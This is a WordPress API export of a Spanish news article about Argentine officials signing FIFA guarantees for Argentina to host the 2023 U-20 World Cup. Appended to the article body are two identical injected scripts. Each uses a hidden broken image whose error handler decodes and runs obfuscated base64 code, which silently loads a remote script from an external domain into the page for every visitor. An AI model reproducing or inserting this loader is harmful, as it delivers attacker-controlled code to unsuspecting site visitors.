{"id":2533,"date":"2023-04-19T10:47:00","date_gmt":"2023-04-19T13:47:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2533"},"modified":"2025-08-14T00:18:39","modified_gmt":"2025-08-14T03:18:39","slug":"massa-lammens-y-tapia-firmaron-los-avales-para-el-mundial-sub-20-en-argentina","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2533","title":{"rendered":"Massa, Lammens y Tapia firmaron los avales para el mundial Sub-20 en Argentina"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\">El ministro de Econom\u00eda, Sergio Massa, junto a su par de Turismo, Mat\u00edas Lammens, y el presidente de la Asociaci\u00f3n del F\u00fatbol Argentino (AFA), Claudio Tapia, firmaron este lunes los permisos y avales requeridos por la Federaci\u00f3n Internacional de F\u00fatbol Asociado (FIFA) para que Argentina sea designada oficialmente organizadora del Campeonato Mundial Sub-20, que se desarrollar\u00e1 desde pr\u00f3ximo 20 de mayo al 11 de junio.<\/h5>\n\n\n\n<p>\u201cPara nosotros es un orgullo y como gobierno una enorme oportunidad que uno de los eventos deportivos m\u00e1s importantes a nivel mundial se desarrolle en la Argentina\u201d, sostuvo Massa tras la firma. En esta l\u00ednea, el Ministro hizo hincapi\u00e9 en que \u201chubo por parte de la AFA sentido de la oportunidad para hacer valer el campeonato de la Argentina y la oportunidad de realizar el Mundial sub 20\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s, Massa se\u00f1al\u00f3 que el evento \u201crepresenta desde el punto de vista econ\u00f3mico y desde el punto de vista de la marca pa\u00eds una enorme oportunidad; la oportunidad de mostrar la Argentina al mundo y sus bellezas naturales\u201d. \u201cTambi\u00e9n, la oportunidad de recibir miles de turistas, generar divisas, trabajo y recibir tecnolog\u00eda que los organizadores a nivel internacional traen para el desarrollo de este evento\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>Por su parte, Lammens destac\u00f3 la importancia de \u201cesta posibilidad de recibir un Mundial sub 20 despu\u00e9s de m\u00e1s de dos d\u00e9cadas\u201d. \u201cEs un reconocimiento a la tradici\u00f3n futbolera de la Argentina y sobre todo es una enorme oportunidad\u201d, a\u00f1adi\u00f3 Lammens, al tiempo que explic\u00f3 que \u201clos eventos deportivos de esta magnitud generan un importante ingreso de turistas y nos permiten seguir posicionando a nuestro pa\u00eds como un destino tur\u00edstico l\u00edder en la regi\u00f3n y promocionando nuestros atractivos en todo el mundo\u00bb.<\/p>\n\n\n\n<p>En tanto, Tapia celebr\u00f3 \u201cpoder avanzar con la documentaci\u00f3n pertinente para que la AFA y nuestro pa\u00eds puedan ser organizadores y sede del Mundial m\u00e1s importante que tiene FIFA a nivel juvenil\u00bb. \u00abCon la documentaci\u00f3n respaldatoria que nos han presentado Sergio Massa y Mat\u00edas Lammens hemos logrado cumplimentar, en tiempo r\u00e9cord, la documentaci\u00f3n administrativa que solicita FIFA para poder ser sede del torneo, para poder afianzar este proyecto de Selecciones Juveniles que tenemos\u00bb, agreg\u00f3.<\/p>\n\n\n\n<p>Estuvieron presentes el Jefe de Asesores Leonardo Madcur; el secretario de Legal y Administrativa, Ricardo Casal; los miembros del Comit\u00e9 Ejecutivo de la AFA: Rodolfo D\u2019Onofrio, David Garz\u00f3n, Marcelo Achile, Guillermo Raed (Vicepresidentes); el Secretario General, V\u00edctor Blanco Rodr\u00edguez; el Prosecretario, Luciano Nakis; el Tesorero, Pablo Toviggino; el Protesorero, Horacio Martignoni; el Prosecretario Ejecutivo, Maximiliano Levy; Pascual Caiella, Sergio Rapisarda, Cristian Malaspina, Horacio Arreceygor, Francisco Mar\u00edn, Adri\u00e1n Zaffaroni, Ignacio Astore, Dante Majori, Carlos Pandolfi, Dario Zamoratte, Alberto Beacon (Vocales); el Asesor Legal, Andr\u00e9s Pat\u00f3n Urich; el Gerente de Relaciones Institucionales, Gustavo Lorenzo; Ezequiel Melara\u00f1a, Presidente de Club Atl\u00e9tico Tigre; Juan Manuel Cavagliatto, Presidente de Instituto de C\u00f3rdoba; y, el Gerente de Licencia de Clubes, Javier Vijande Penas.<\/p>\n\n\n\n<p>Cabe destacar que esta iniciativa representa un hecho hist\u00f3rico que refuerza las posibilidades del pa\u00eds en la disputa por ser sede del Mundial 2030. Adem\u00e1s, desde el punto de vista econ\u00f3mico, entre la inversi\u00f3n que realizar\u00e1 la FIFA en materia de organizaci\u00f3n y una llegada estimada de 230 mil turistas extranjeros, la Argentina, podr\u00e1 no s\u00f3lo contar con la Selecci\u00f3n siendo anfitri\u00f3n sino tener un impacto adicional de ingreso de divisas en su econom\u00eda, que se calculan en m\u00e1s de 600 millones de d\u00f3lares.<\/p>\n\n\n\n<p><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El ministro de Econom\u00eda, Sergio Massa, junto a su par de Turismo, Mat\u00edas Lammens, y el presidente de la Asociaci\u00f3n del F\u00fatbol Argentino (AFA), Claudio Tapia, firmaron este lunes los permisos y avales requeridos por la Federaci\u00f3n Internacional de F\u00fatbol Asociado (FIFA) para que Argentina sea designada oficialmente organizadora del Campeonato Mundial Sub-20, que se [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2534,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-2533","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2533"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2533"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2533\/revisions"}],"predecessor-version":[{"id":7109,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2533\/revisions\/7109"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2534"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2533"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}